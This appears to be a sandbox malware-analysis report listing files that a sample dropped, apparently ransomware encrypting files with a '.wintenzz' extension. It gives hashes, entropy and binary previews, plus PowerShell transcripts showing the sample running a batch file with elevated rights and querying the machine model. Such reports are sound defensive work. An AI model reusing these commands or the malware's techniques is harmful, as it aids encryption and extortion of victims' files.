Preview:	................fsw0nNdizfDEvePwZNc9Wr2k.........^k\|.....4hM.6...C....l.Q.Cs{.0Z. ..`&.cYf.....m.V..-.O.../.mwQ... Y...Y_.b.6,?UY."f0..S0.'F.Q.....KK......b:K....QD<../.eQ..!.7m/.:v......C.&.Q...T.grr..t.=..}?...~.....np..{~J.:.k.J{]..)~X.9.r.....9.....f..................]-).......y......!..m).,..T......T.&<."G.5...r.}.....+..L:.{.UQ..Y..2....N.5.2..R.......d..^Cq.V[n._.......M."...j.&%..k.d.....2....F[.`..J.\\6,.{+\....q.....HYK.............7$..W9....".2....D...SzR......N...m#.FB...]z;N....F.g...-~.....L........H.H.R%.G2).I.~&z....4+F#..\|o...;.{a..E..}.&f.!..6.B...:......@x.a...:$W...>\|.H^...-.-_.M.t....$Y.8c....v6...V.U.>..7.h~S.......z.>.8ya...jkW....Q...S.x.o..T..!k.n2K...K..#`......9a..+.&.......XMI..X/6/.&`....R8..pY..+w.tE....Hm/..,ue...~4..d..P..Yu..m.@.+....Ftw.4......A.I..~..M.n..d.F..f.....4....N.....J....F....REW6......-k. A.~..k.kO....)..hG..M..p....w].....m....~...w..M..s1...........F...e.K.8....M.M.4.Q;yW....o..f.y5

C:\Users\user\Desktop\NIRMEKAMZH.jpg.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.786108547301971
Encrypted:	false
SSDEEP:	24:UHOO1wLBe/8OUNq3zhdAd0ecCZSPoIlySYzaivhFbXiBuIHjnguxfB:quBu85Oz8d0nCZSPoIlZYzai5Fb+hgo
MD5:	BC4DA157B012631994B152831C06D82D
SHA1:	6652854E672C1E26D3F56B4D84AF83D9AD1D8C34
SHA-256:	91F9F144C9F48B7A87D63617ED62DF09E9217D5AD80B1D316C148B59ECF3B0E3
SHA-512:	E21FF0589D2C3ABCC9E846E96C62CBC68F14B3806A70A8E1A07349BD487B8784545B6096DE513FA50DA3F15A35ABC155A6D32183A405C014845AD9AB2CF7617D
Malicious:	false
Preview:	................fsw0nNdizfDEvePwZNc9Wr2k.........^k\|.....4hM.6...C....l.Q.Cs{.0Z. ..`&.cYf.....m.V..-.O.../.mwQ... Y...Y_.b.6,?UY."f0..S0.'F.Q.....KK......b:K....QD<../.eQ..!.7m/.:v......C.&.Q...T.grr..t.=..}?...~.....np..{~J.:.k.J{]..)~X.9.r.....9.....f..................]-).......y......!..m).,..T......T.&<."G.5...r.}.....+..L:.{.UQ..Y..2....N.5.2..R.......d..^Cq.V[n._.......M."...j.&%..k.d.....2....F[.`..J.\\6,.{+\....q.....HYK.............7$..W9....".2....D...SzR......N...m#.FB...]z;N....F.g...-~.....L........H.H.R%.G2).I.~&z....4+F#..\|o...;.{a..E..}.&f.!..6.B...:......@x.a...:$W...>\|.H^...-.-_.M.t....$Y.8c....v6...V.U.>..7.h~S.......z.>.8ya...jkW....Q...S.x.o..T..!k.n2K...K..#`......9a..+.&.......XMI..X/6/.&`....R8..pY..+w.tE....Hm/..,ue...~4..d..P..Yu..m.@.+....Ftw.4......A.I..~..M.n..d.F..f.....4....N.....J....F....REW6......-k. A.~..k.kO....)..hG..M..p....w].....m....~...w..M..s1...........F...e.K.8....M.M.4.Q;yW....o..f.y5

C:\Users\user\Desktop\NIRMEKAMZH.xlsx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.802440774714337
Encrypted:	false
SSDEEP:	24:jxmEybYGt30BdFcMgyLoRsOjKbGEY+KZwCxApF+9X+0vaYp:jxm7YGN0BdFDL7O2bGEYtLxAE+0vaa
MD5:	007B9AD1F3D56955697F0828BD1E7F3B
SHA1:	071D67DED540ACD4EE655AD33160BC9A003FC13C
SHA-256:	A8194CD6A68C6B1354FBD4F568996643E18FC56D5D0DAAC72DD869FE5B7FBD67
SHA-512:	F4311000B5580C0800261E8CA3F3A6E720620F8F97BEC8B1A3E810E8D0B18823C27841565BDC594E0356AC05D7284EAA533FC9EEAA984CA0D66820322D45692B
Malicious:	false
Preview:	................ZMaJZFzR9VAa8CuYZy1uJ7kC........E.64...[s.Vc.......D~...y.N.....~z.....".R......IL.K.I.&[...D...Q..iF.o=s.ta..C.<...X^Q.{.W\...E..d\|...a..dv.WA]...M~..J.q.k....Y.CJH..3_.....T....]....r...hz...}..c.d.."...o....V.......e...`.}l.>......vn.I.S.GN_.... .....H.{.......r..k&....,.....E.;.g.....y.O>B.@5PR.G'i,d.V..h...vL<...T...S...=....J..;.g..o.c......q..n..i^...I.....r'K...G..4C;X..l&.....mu.!b....+.2L.O.....`.q$..{.qm..;K.[.9.]..a...@..G.. .g..!".%.g2..P{Px&..=.).....a+..\....&.O.r.b.i..h...Y 4.?...,Q}O..o..,...8j9....G.6L.D....h.1]+...c...B.GM.ZH.?i....H..@8,w.....8b.P<W.5.H]...:F.....R....9.3.rX....oi....p..r.....xh!.@/......u...>........Z.8..\-.3........C.x..".iR.....H>.a\.].n..+.>...{..v.:.....8.qG.....$...A:...pU......ZlO.X.........U...G....MF..\|..]f..='...=3.x.%...H3VT......?..t[8xV[R.J.`..C...u.).../sI.7.u.OB6@wm.22.....S$.}..c..L....q.PO.....,..!Id1u.......7/1l..... .8t...F.\,......8..d...lU,.G-...z.!.y.!L.!7.f,..

C:\Users\user\Desktop\NIRMEKAMZH.xlsx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.802440774714337
Encrypted:	false
SSDEEP:	24:jxmEybYGt30BdFcMgyLoRsOjKbGEY+KZwCxApF+9X+0vaYp:jxm7YGN0BdFDL7O2bGEYtLxAE+0vaa
MD5:	007B9AD1F3D56955697F0828BD1E7F3B
SHA1:	071D67DED540ACD4EE655AD33160BC9A003FC13C
SHA-256:	A8194CD6A68C6B1354FBD4F568996643E18FC56D5D0DAAC72DD869FE5B7FBD67
SHA-512:	F4311000B5580C0800261E8CA3F3A6E720620F8F97BEC8B1A3E810E8D0B18823C27841565BDC594E0356AC05D7284EAA533FC9EEAA984CA0D66820322D45692B
Malicious:	false
Preview:	................ZMaJZFzR9VAa8CuYZy1uJ7kC........E.64...[s.Vc.......D~...y.N.....~z.....".R......IL.K.I.&[...D...Q..iF.o=s.ta..C.<...X^Q.{.W\...E..d\|...a..dv.WA]...M~..J.q.k....Y.CJH..3_.....T....]....r...hz...}..c.d.."...o....V.......e...`.}l.>......vn.I.S.GN_.... .....H.{.......r..k&....,.....E.;.g.....y.O>B.@5PR.G'i,d.V..h...vL<...T...S...=....J..;.g..o.c......q..n..i^...I.....r'K...G..4C;X..l&.....mu.!b....+.2L.O.....`.q$..{.qm..;K.[.9.]..a...@..G.. .g..!".%.g2..P{Px&..=.).....a+..\....&.O.r.b.i..h...Y 4.?...,Q}O..o..,...8j9....G.6L.D....h.1]+...c...B.GM.ZH.?i....H..@8,w.....8b.P<W.5.H]...:F.....R....9.3.rX....oi....p..r.....xh!.@/......u...>........Z.8..\-.3........C.x..".iR.....H>.a\.].n..+.>...{..v.:.....8.qG.....$...A:...pU......ZlO.X.........U...G....MF..\|..]f..='...=3.x.%...H3VT......?..t[8xV[R.J.`..C...u.).../sI.7.u.OB6@wm.22.....S$.}..c..L....q.PO.....,..!Id1u.......7/1l..... .8t...F.\,......8..d...lU,.G-...z.!.y.!L.!7.f,..

C:\Users\user\Desktop\PWZOQIFCAN.png Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.794245306293652
Encrypted:	false
SSDEEP:	24:tuU4PeR/Osw/uUgipoET13sjwwNrVdBkcTVQ8r6:tLCu/u9f9xshhVdBkcT68r6
MD5:	298BE9D1E9181EEFD8895427E4480FCD
SHA1:	B2AE54851F037725A4241161E496B78401D449C7
SHA-256:	0B45209CD747D98206F6827500F3B3304B9FFAB7786D6C8F1F6C268B77E9594F
SHA-512:	0CF248A7DD3C19DF358AEC947F1942E54A2556EE71CD48F2CAD050E944233AFA7F216788ABAE20AA10DDFCBA77043ABF25EFD0EECDFD92EF3BEEF7A66CD2686E
Malicious:	false
Preview:	................4jGt6AAHyKMPg98UQIeNH3wv..........l.+`.2!U..>.L.0..z.i..R8S...s5..[...........$..;.B.(w....I...2...W....Q\%..2.(B.....?.B...;14N.Sx9}.c62B.qi....F.#.q!.,.=.r.A....... .....o.....F.\q.....#I.5...^w.....2..X.w..}.P.)..U......B.E......v..G...w.A..~......_.z.s..p.i.~.......(P..%E.....gH......gt.o...:EQ.h...-.}..^.&D..CJS..5..s.GQ.Y.6.\|.+.R.i.]...........K...17..&]....k.]......f.jd......dYo.F...n..L..w.f......3.S.=..!/.&.\|.%..u@.p.n.g....F]....Di.kw.(...s..... ..)G7......nE&%J.zD].XNg8G.......@[....Db&wrM.ox.97.AD8..j.............pm.....V^..%..]N.=.../=... .....{...2.y...)...-C.......8"c$.:...WS..ll.f......7~..0.....\Rs_..j.!..&.JWPpr......O5.bu.....R.bqu...P.Q....o.h....FD... @...F"O..i.@=l....<p..9.D....N.... .I.~..;...F_...O..IiC..r+.a...2Dvy..U".~..a...A..... "~...hQ...f.ku...\|.b./.C]..F.T+.Iz\.(.I.JV.P.H..5..!.5.2H...w.W..u..w.;i.....=..d,...s.I. .Q.a.*,..=..9...C...-..x.3.tz.5l(.d..P./Rc.3.=K.d.s.X...nV.b.........

C:\Users\user\Desktop\PWZOQIFCAN.png.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.794245306293652
Encrypted:	false
SSDEEP:	24:tuU4PeR/Osw/uUgipoET13sjwwNrVdBkcTVQ8r6:tLCu/u9f9xshhVdBkcT68r6
MD5:	298BE9D1E9181EEFD8895427E4480FCD
SHA1:	B2AE54851F037725A4241161E496B78401D449C7
SHA-256:	0B45209CD747D98206F6827500F3B3304B9FFAB7786D6C8F1F6C268B77E9594F
SHA-512:	0CF248A7DD3C19DF358AEC947F1942E54A2556EE71CD48F2CAD050E944233AFA7F216788ABAE20AA10DDFCBA77043ABF25EFD0EECDFD92EF3BEEF7A66CD2686E
Malicious:	false
Preview:	................4jGt6AAHyKMPg98UQIeNH3wv..........l.+`.2!U..>.L.0..z.i..R8S...s5..[...........$..;.B.(w....I...2...W....Q\%..2.(B.....?.B...;14N.Sx9}.c62B.qi....F.#.q!.,.=.r.A....... .....o.....F.\q.....#I.5...^w.....2..X.w..}.P.)..U......B.E......v..G...w.A..~......_.z.s..p.i.~.......(P..%E.....gH......gt.o...:EQ.h...-.}..^.&D..CJS..5..s.GQ.Y.6.\|.+.R.i.]...........K...17..&]....k.]......f.jd......dYo.F...n..L..w.f......3.S.=..!/.&.\|.%..u@.p.n.g....F]....Di.kw.(...s..... ..)G7......nE&%J.zD].XNg8G.......@[....Db&wrM.ox.97.AD8..j.............pm.....V^..%..]N.=.../=... .....{...2.y...)...-C.......8"c$.:...WS..ll.f......7~..0.....\Rs_..j.!..&.JWPpr......O5.bu.....R.bqu...P.Q....o.h....FD... @...F"O..i.@=l....<p..9.D....N.... .I.~..;...F_...O..IiC..r+.a...2Dvy..U".~..a...A..... "~...hQ...f.ku...\|.b./.C]..F.T+.Iz\.(.I.JV.P.H..5..!.5.2H...w.W..u..w.;i.....=..d,...s.I. .Q.a.*,..=..9...C...-..x.3.tz.5l(.d..P./Rc.3.=K.d.s.X...nV.b.........

C:\Users\user\Documents\20210411\PowerShell_transcript.134349.O27WoF+l.20210411125733.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.001039861307327
Encrypted:	false
SSDEEP:	24:BxSAG7vBZ0x2DOXQcaWAHjeTKKjX4CIym1ZJX6cyenxSAZKa:BZsvj0oOAqAqDYB1ZgdQZZKa
MD5:	341AECB91B6668CDD4B9DA14BC2C2A7D
SHA1:	514C7894101459BE24835AEBE28FF459A3FDB2B4
SHA-256:	C9444BC912F0EBAA7701DE53232F49FEEB9309EF57603A1C37BA9C5F5C0B1E00
SHA-512:	EA241E07C1162E9D5C5AE80E0BDC2C2FF83D5A752FBB8D3B25D6652A5E14E29BE8331A6D97D4C054E9526292089F1EBB2BF0EE50AB10C5EF5F62C78342656611
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210411125733..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 134349 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Start-Process C:\ProgramData\winfrce.bat -Verb runas..Process ID: 6240..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210411125733..******************..PS>Start-Process C:\ProgramData\winfrce.bat -Verb runas..******************..Command start time: 20210411125924..******************..PS>$global:?..True..******************..Windows PowerShell transcript end..End time: 20210411125924..********************..

C:\Users\user\Documents\20210411\PowerShell_transcript.134349.QPBOkNqk.20210411125720.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.010099704953067
Encrypted:	false
SSDEEP:	24:BxSAW7vBZ0x2DOXQcaW/HjeTKKjX4CIym1ZJXKcNnxSAZF:BZcvj0oOAq/qDYB1Z0yZZF
MD5:	527FF2A8395FB4863A5C0A2BA810F6B9
SHA1:	45E0E8EF48893A03F512AB99E9548F261E6CFB82
SHA-256:	CCFECADAEAE45840C08F3C1F18B5D86FCD73472C9C18E8875D6A48C024B168FB
SHA-512:	E901485D5D0C3CB2D83B89BD680A7B86A36FB0DEB7B93316F47190AC7B6F013A76B147788E10C8F41D2C294A4B89EFF2DDF139847A50905B6E405B45245B2799
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210411125720..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 134349 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Start-Process C:\ProgramData\winfrce.bat -Verb runas..Process ID: 5996..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210411125720..******************..PS>Start-Process C:\ProgramData\winfrce.bat -Verb runas..******************..Command start time: 20210411125847..******************..PS>$global:?..True..******************..Windows PowerShell transcript end..End time: 20210411125847..********************..

C:\Users\user\Documents\20210411\PowerShell_transcript.134349.pKaxdR+X.20210411125708.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	976
Entropy (8bit):	5.040493516518649
Encrypted:	false
SSDEEP:	24:BxSAc7vBZ0x2DOX8vXoWAHjeTKKjX4CIym1ZJXgXxMnxSAZbS:BZ6vj0oOMvXLAqDYB1ZO0ZZbS
MD5:	C67C1EC708299FEF9E1DAE7A4E10D4C0
SHA1:	4E9E8E250BCC836090FE98B0915EF213DEE9A3DA
SHA-256:	36F907F476D0F6B7EAAD92331AA003101DD5973FD6209FC2F41DA21E6C665C78
SHA-512:	467E0E13A1DB266CB6B7644ABCA7AB31769A8972913B4C66767A9AED3E085963FAD32F57AC685A342E55013A159C1AEE0B5432B322311BA6059B40D67F4D10D7
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210411125708..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 134349 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell get-wmiobject win32_computersystem \| fl model..Process ID: 2792..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210411125708..******************..PS>get-wmiobject win32_computersystem \| fl model......model : uTULWb3T........******************..Command start time: 20210411125933..******************..PS>$global:?..True..******************..Windows PowerShell transcript end..End time: 20210411125941..********************..

C:\Users\user\Documents\20210411\PowerShell_transcript.134349.sQj2rdHh.20210411125629.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	976
Entropy (8bit):	5.044786514499251
Encrypted:	false
SSDEEP:	24:BxSAC7vBZ0x2DOX8vXoW8HjeTKKjX4CIym1ZJXw/jXxSnxSAZf:BZ4vj0oOMvXL8qDYB1Za/b6ZZf
MD5:	E65E1EC36E0C86804987DD092B674E76
SHA1:	B091669650577B5FABD851EDF9B8AF24FD52A71C
SHA-256:	B6BC384FE3B7B89FF805C0E554BD596E00FB98C0BC360275EC92CC50316B99C1
SHA-512:	34D2C7B60F4966443636E9FAFFFB2F020CA4807A7C5938D4603133D4308F7971196F7ACDA32E8E93937E8B0B411B0F8CA6A616AD818FA6AFE4BCC35924E73550
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210411125629..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 134349 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell get-wmiobject win32_computersystem \| fl model..Process ID: 7148..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210411125629..******************..PS>get-wmiobject win32_computersystem \| fl model......model : uTULWb3T........******************..Command start time: 20210411125755..******************..PS>$global:?..True..******************..Windows PowerShell transcript end..End time: 20210411125755..********************..

C:\Users\user\Documents\20210411\PowerShell_transcript.134349.sQj2rdHh.20210411125629.txt.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1040
Entropy (8bit):	7.787325825595193
Encrypted:	false
SSDEEP:	24:iP9fpDKPMklFVm2QyMt2yVaoHUkiul6vfQrS73k2CAz40xjm:iP/OPMeFhMt2Oh/iRfGQ3kjW4em
MD5:	AAB1865105138B66E7EAC10501D46393
SHA1:	ED36A98913381F2972420F6F63941D4D45411FA4
SHA-256:	DA0036FF4B123B72B6CC7314E94FCF1EAD640594AE23B1357251C83FE97EF7FA
SHA-512:	87A623593075566C17923411CEB25C90EE92966D700CB8D05C5FCE5B1E8E41AD69BA58DCA274AE78DEE0901CCFE13F64651E00165651933C198AB93F203B2724
Malicious:	false
Preview:	................q4Za0M7QGR9DDnZ6eHNhfKN2............[T..$96......zdB..<......^5..x."f. ..\..;..........Rw.....>.M.J$.M.yLd.7.P..H.cN\|...#.!)...6.....v....Mgd.'.Z..~..9>.2....!.\.....u,.a.q..,J.iX...0..@.9.Vu...YU.j...H.lt!.....k.M.?D...-6.........8L....J.....>b.>....c...b.x.vaI..;.............3.N1y.]...C..2.z....!...$...G..%.i..H.Yj3p..2.:..}.e..i..e....\|..R.W......>N.....}O...I.....s....W.F9.....MV...{....@5.b.......4/....H._.....N.-t..w.B.v9W..x.GW.....0.k<..Rk.U>..O)..1...P.i.yp.y4.T1.>....^.K..l..?y9...A...J../.......w9.....O c.K..m..z.SP.%..%{..-._..p{.....].o..*q..T..:..J....$.i......e......L....W...#.s....S..'P..e$/....N.X.M....w..E......b..5...qW]..uy.....H.......nh.I...HK..Zn..^]......QP..L6qF.cD5.X...z.3.M.LbB.= .J.... ..VTm.k&..Be.?u/a..N.X.B.!U...-<7.Zu....,g2...+..v....V..].M.]^..+6B.Ku.H..0....<......O^.nq.g.y..-.r....<P...VY......!.38.T.g.."..J1.o.{4.+s.;......I.y..$.O=vX&.:.r...#.,/.>p./..a_(..._.$.7S#M.2.4.%u.=......L..q4..s.X...

C:\Users\user\Documents\20210411\PowerShell_transcript.134349.u5P0y+fn.20210411125637.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.0126706053405385
Encrypted:	false
SSDEEP:	24:BxSAJ7vBZ0x2DOXQcaWDHjeTKKjX4CIym1ZJX7cqnxSAZu:BZFvj0oOAqDqDYB1ZZjZZu
MD5:	203FD7F69324B20D08BEF1CA7C051524
SHA1:	53C2B368CF3A17830277E1DB7446052E40D3F2BB
SHA-256:	24C31FF357A8769B0B06AB1839858CDDE61399880ECE2A5842DDB2040684F0F0
SHA-512:	6FF37EB63A6FB85D4DB403011530D900930B8896F50DEB7C3DEC1B47D491A3E37E69CB4A8C99FA8FDB60A4908F1CDB41E41EDF295F352207146C4B7C9B0BA284
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210411125637..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 134349 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Start-Process C:\ProgramData\winfrce.bat -Verb runas..Process ID: 5992..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210411125637..******************..PS>Start-Process C:\ProgramData\winfrce.bat -Verb runas..******************..Command start time: 20210411125804..******************..PS>$global:?..True..******************..Windows PowerShell transcript end..End time: 20210411125804..********************..

C:\Users\user\Documents\20210411\PowerShell_transcript.134349.u5P0y+fn.20210411125637.txt.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.715324445244513
Encrypted:	false
SSDEEP:	24:b6mah7m07UYAffYE+3Jp3AlcgVwWSVz2RyKl7rGU4T:bFqglffYEsJp3qcgVwjSRbHve
MD5:	F5D509453F9B6B796B7F6545D465FE92
SHA1:	C0BA95B1046BED9C69040D00364EE8DBE9D4B452
SHA-256:	A7AC6A3B13B3F652120E62DE62269FB4C5CF918E213547D059362AD0080B62CD
SHA-512:	94CD9EB23742BED9D8163B989C7BA47E6CE06002561FE6A0AF51BBD4A413D75EFBD65A2D7F0BE4A50EB75360610760FEB7E4DFF75218196B3F6B60B2D013FA05
Malicious:	false
Preview:	................rwezjNg3YrHy5g722RwPGVI2........cf.PT....~..$..S._z.....34.w>.8....[..WV...&..x.....n.3.Sp........2...P......8...N.oQ\..?.....R..>.7..l....!Z.C....oE.......O..6....].LBy.p..%Q.c....r8l&...P#l..).5..h...Q.$.4Ve.....\|ci9..&......g...Tb...S...j.(V.r...orr.....JoI..Savc..i.#..N;.Tq..WO.W..lb......F..".tf_.<.UVR.Yf..,.K.v.G..6....>..m.@.}...D]U.....FiRs..F/.....6........r.P&.4cT.?....c1l...Z._}Qfc.Y..+\...9.......[AV..........'..m.,j.......C..D.+..r.8&..G.o.S..vx...m...0.3._..........Y..........2w.....^.;...j.R..sk..^6.U.............9...%...8..1..a.fC..OjI&.'.h.7W..P....Y;M,....[.......}....]....I........ .H0.O.(..4L...e._..."^.......IV.....W9.....:.....g.QQR..x8}R...'..~.'.\...T.f..........(/..L.wa ...5..~.O..\|zI...a..xCs......Vc.P.S=..E...,[~..}.....9Z...(...]C.s..Gf.X...C...o...{.O9....X.......i{c.........(.U..../..I...c....`...\..52..j.,,.b....<.zg...B.6E.[.....'.1g.....h..c..1..[>.f/.......Tn.>^/6..0bN...2....n

C:\Users\user\Documents\BQJUWOYRTO.mp3 Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.80848899750217
Encrypted:	false
SSDEEP:	24:zyB3vr2ujcWYt/yb3iD9eu+OoPSKzocDjalP89QIDFzk9EAC5ypOj2:43T2LWYt6ef5oPFXfalP+QIDOy5yIi
MD5:	5DE523D81833C4148B21F25BAB802356
SHA1:	21CE5B0369E5063554944D2006380B3360166871
SHA-256:	6655B5B34AC50AA93741B20D9868AB64669B21730A40568CBDC5C1D9B7DA4519
SHA-512:	097B2E9FDAF05AC111068A07DC113EFA04BE7BD160B46CA9AD1175F7D3B3E3840DDD482476652092A282DB371756C85FC2ACC4AD62C6FECD96B1DD9242B6EB93
Malicious:	false
Preview:	................6bY56M2FOUV0vBvnok2fqgpE................\.~U.ZE.[%.T.=O<R,$..'..s\..\|.d).......#.;:..s.;...]....G...#.m^..W..?........4.&.....W..{..J$:...>/.+r....+m.#.{.XI.....V....,..'....:.-f4..1...;4...D_.z.2 ._..(.............h........2T0.@I.@.J.z..J.lx......\|.T.WR...\|...$.vR.......7.....PD.eRH.%xI..=.8}...............B...Tz.......P;..V..>z.Q....f...j...cP.......7J..n<...W9..O.....s.e.'.+. .V..H.@.E;...l.._..'.ibp.'.Z+.+.9..:...t.mG.k.ln.'#.3..E.,...oh..Nz.....-wE.....ogd1.8.vk.J....V.\|2..r.T}.W...u...P1.25.3.3..n..d..iDA44s;.%lk5.a.k,#W..w...-+.K....;...g.,+p..dW...N{..\~..A.7.F....1.\|..Yl.o~%`..f.....hp6...#=..).#..5ch.....W....;.&...TV.....\|.M..a.Pj.3j....r{!?..'.....U.K............i.N...4C...F.......9...g\|mhg....L.N.-.x.j.RB."t...M..t.t..K..w..\NJ$..=....&.....z....u%N..Z.7...)..M....!..3.v@..SP.7....G...Q.....M....Sym.Q......8.&/....i....)......<..l)k).\|sf..>.X..vB.3.f.U..2.9....#b........%......S].h^5n..5^.y.2]....v...(l...ZHV:.[..4S3..N>

C:\Users\user\Documents\BQJUWOYRTO.mp3.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.80848899750217
Encrypted:	false
SSDEEP:	24:zyB3vr2ujcWYt/yb3iD9eu+OoPSKzocDjalP89QIDFzk9EAC5ypOj2:43T2LWYt6ef5oPFXfalP+QIDOy5yIi
MD5:	5DE523D81833C4148B21F25BAB802356
SHA1:	21CE5B0369E5063554944D2006380B3360166871
SHA-256:	6655B5B34AC50AA93741B20D9868AB64669B21730A40568CBDC5C1D9B7DA4519
SHA-512:	097B2E9FDAF05AC111068A07DC113EFA04BE7BD160B46CA9AD1175F7D3B3E3840DDD482476652092A282DB371756C85FC2ACC4AD62C6FECD96B1DD9242B6EB93
Malicious:	false
Preview:	................6bY56M2FOUV0vBvnok2fqgpE................\.~U.ZE.[%.T.=O<R,$..'..s\..\|.d).......#.;:..s.;...]....G...#.m^..W..?........4.&.....W..{..J$:...>/.+r....+m.#.{.XI.....V....,..'....:.-f4..1...;4...D_.z.2 ._..(.............h........2T0.@I.@.J.z..J.lx......\|.T.WR...\|...$.vR.......7.....PD.eRH.%xI..=.8}...............B...Tz.......P;..V..>z.Q....f...j...cP.......7J..n<...W9..O.....s.e.'.+. .V..H.@.E;...l.._..'.ibp.'.Z+.+.9..:...t.mG.k.ln.'#.3..E.,...oh..Nz.....-wE.....ogd1.8.vk.J....V.\|2..r.T}.W...u...P1.25.3.3..n..d..iDA44s;.%lk5.a.k,#W..w...-+.K....;...g.,+p..dW...N{..\~..A.7.F....1.\|..Yl.o~%`..f.....hp6...#=..).#..5ch.....W....;.&...TV.....\|.M..a.Pj.3j....r{!?..'.....U.K............i.N...4C...F.......9...g\|mhg....L.N.-.x.j.RB."t...M..t.t..K..w..\NJ$..=....&.....z....u%N..Z.7...)..M....!..3.v@..SP.7....G...Q.....M....Sym.Q......8.&/....i....)......<..l)k).\|sf..>.X..vB.3.f.U..2.9....#b........%......S].h^5n..5^.y.2]....v...(l...ZHV:.[..4S3..N>

C:\Users\user\Documents\BWDRWEEARI.jpg Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.790791647402939
Encrypted:	false
SSDEEP:	24:52zlgYQSeyWfXLrfyy7l/UTdqWowR/gIDHlgRdgPij8E:QBgxzDShou1HlUmI
MD5:	315543CD9F263D2091F38DE9957824F5
SHA1:	B9C6B7BF7C121E1F2E9318BD60C3117FB921F1C4
SHA-256:	28F6BADFB8CBDF8EFA313A3A77E55677500CC67A1654EF6A9C28FA5A5445EC38
SHA-512:	13B36EF8387FE5B2B1239F25EC7A6EE18DFADC4E0C3B23A2DC0EA8333E27FDDE4C22BE02C402B9202EA8259C1AE0B2FDE8DA424D81A77E22A55AD0E9AC1BD11C
Malicious:	false
